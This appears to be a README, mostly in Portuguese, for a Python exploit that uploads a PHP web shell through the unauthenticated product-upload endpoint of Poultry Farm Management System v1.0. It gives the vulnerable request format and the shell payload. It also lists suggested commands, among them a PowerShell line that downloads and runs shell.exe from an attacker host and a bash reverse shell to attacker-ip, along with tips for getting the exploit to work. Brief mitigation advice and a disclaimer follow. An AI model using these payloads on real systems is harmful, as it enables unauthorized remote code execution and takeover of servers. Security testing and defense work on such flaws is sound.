
Exploit em Python para execução remota de código não autenticada via upload de arquivo no Poultry Farm Management System v1.0. Envia shells PHP para executar comandos arbitrários do sistema em alvos vulneráveis.
Upload de Arquivo Não Autenticado com Execução Remota de Código
O Sistema de Gestão de Fazenda de Aves v1.0 contém uma vulnerabilidade crítica na funcionalidade de upload de produtos. A aplicação falha ao validar e sanitizar adequadamente os uploads de arquivos, permitindo que atacantes enviem arquivos PHP disfarçados como imagens de produtos. Esses arquivos PHP carregados podem ser executados para alcançar a execução remota de código.
POST /paultry/farm/product.php or POST /farm/product.php
A vulnerabilidade pode ser explorada por:
requestscolorama (para saída colorida)pip install requests colorama
Ou instale todas as dependências:
pip install -r requirements.txt
Execute o script interativamente:
python exploit.py
O script solicitará:
==================================================
Interactive Backdoor Upload Tool
==================================================
Enter target IP address: 192.168.1.100
Enter target port (default: 80): 8080
Enter command to execute (default: powershell payload):
Command: whoami
==================================================
CONFIRMATION
==================================================
Target URL: http://192.168.1.100:8080
Command: whoami
Do you want to proceed? (yes/no): yes
✅ Entrada Interativa - Solicita IP, porta e comandos personalizados
✅ Valores Padrão - Padrões sensatos para conveniência
✅ Saída Colorida - Saída colorida no terminal para fácil leitura
✅ Etapa de Confirmação - Verifique as configurações antes da execução
✅ Tratamento de Erros - Mensagens de erro elegantes para requisições com falha
✅ Comandos Flexíveis - Suporte a qualquer comando shell ou payload PowerShell
powershell -Command "Invoke-WebRequest http://attacker-ip:8787/shell.exe -OutFile shell.exe; Start-Process shell.exe"
bash -i >& /dev/tcp/attacker-ip/4444 0>&1
whoami
id
ifconfig
hostname
pwd
/assets/img/productimages/system()POST /paultry/farm/product.php
Content-Type: multipart/form-data
category=CHICKEN
product=rce
price=100
save=
productimage=[PHP_PAYLOAD]
<?php system('COMMAND_HERE');?>
O exploit foi testado em:
⚠️ AVISO LEGAL
Esta ferramenta é fornecida apenas para testes de segurança autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal.
Atualize o Software - Aplique patches de segurança se disponíveis
Validação de Upload de Arquivo
Configuração
<Directory /uploads>
php_flag engine off
AddType text/plain .php .phtml .php3 .php4 .php5 .phar
</Directory>
Controle de Acesso
Monitoramento
Error: Connection refused
Solution: Verify the target IP and port are correct and the application is running
Error: Failed to upload shell. Status code: 404
Solution: The endpoint path may differ. Common paths: /farm/, /paultry/farm/
Error: Command output is empty
Solution: PHP execution may be disabled or the file wasn't uploaded correctly
Para problemas, perguntas ou melhorias, consulte o repositório GitHub ou a página do Exploit-DB.
Última Atualização: Dezembro 2024
Status: Verificado e Testado